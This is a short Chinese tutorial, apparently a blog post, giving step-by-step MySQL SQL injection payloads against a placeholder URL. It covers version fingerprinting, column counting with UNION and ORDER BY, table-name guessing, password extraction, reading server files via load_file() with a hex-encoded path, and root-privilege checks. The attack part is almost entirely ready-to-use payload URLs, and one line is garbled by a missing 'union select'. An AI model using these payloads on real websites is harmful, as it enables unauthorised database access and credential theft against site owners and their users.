MYSQL数据库注入

例如:注入点 http://www.XX.com/index.asp?id=1

1、库的判断 (版本4以上有联合查询语句union)

1、 http://www.XX.com/index.asp?id=1/*注释
// /*注释符只有mysql数据库用 反应正常则为mysql数据库
2、 http://www.XX.com/index.asp?id=1 and ord(mid(version(),1,1))>51
//51是ascll码 3
3、 http://www.XX.com/index.asp?id=1 and mid(version(),1,1)>3
4、http://www.XX.com/index.asp?id=1/!%20s/ 错误则是MySQL
/!40000%20s/ 错误则版本大于4.0
/!60000%20s/ 正常则版本小于6.0
/!50130%20s/ 错误则版本是5.1.30

2、获得字段数目(使用union需要对字段数目限制(前后sql语句字段数目要相同))

1、 http://www.XX.com/index.asp?id=1 union select 1,1,1
//提交类似语句,不断添加1的个数,直到页面返回正确
2、 http://www.XX.com/index.asp?id=1 order by 10
//order by 后面加数字,mysql会解释成第几列排序,假如提交13返回正确,14错误,那么字段数为13

3、获得表名

1、http://www.XX.com/index.asp?id=1 union select 1,2,3,4,5 from 猜测的表名
//返回页面正确即表名正确,页面上多个地方显示数字

4、获得字段值

1、http://www.XX.com/index.asp?id=1 1,version(),3,4,5 from 已知表名
//相应的字段位置显示版本号,同理:
http://www.XX.com/index.asp?id=1 union select 1,password,3,4,5 from 已知表名 where 主键=N
//得到密码

5、利用load_file()函数读取服务器的内容(需要先判断是否为root权限或有文件读取权限)

1、http://www.XX.com/index.asp?id=1 union select 1,load_file(0x633A2F626F742E696E69),3,4,5 from 表名
//0x633A2F626F742E696E69是c:/boot.ini的16进制表示,可以防止php把/转义掉造成错误

5.1、判断是否为root权限管理员

1、http://www.XX.com/index.asp?id=1 and ord(mid(user(),1,1))=114/*
//返回正常则判断为root,ascll码114是r

5.2判断是否有文件读写权限

2、http://www.XX.com/index.asp?id=1 and (select count(*) from MySQL.user)>0

,,

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值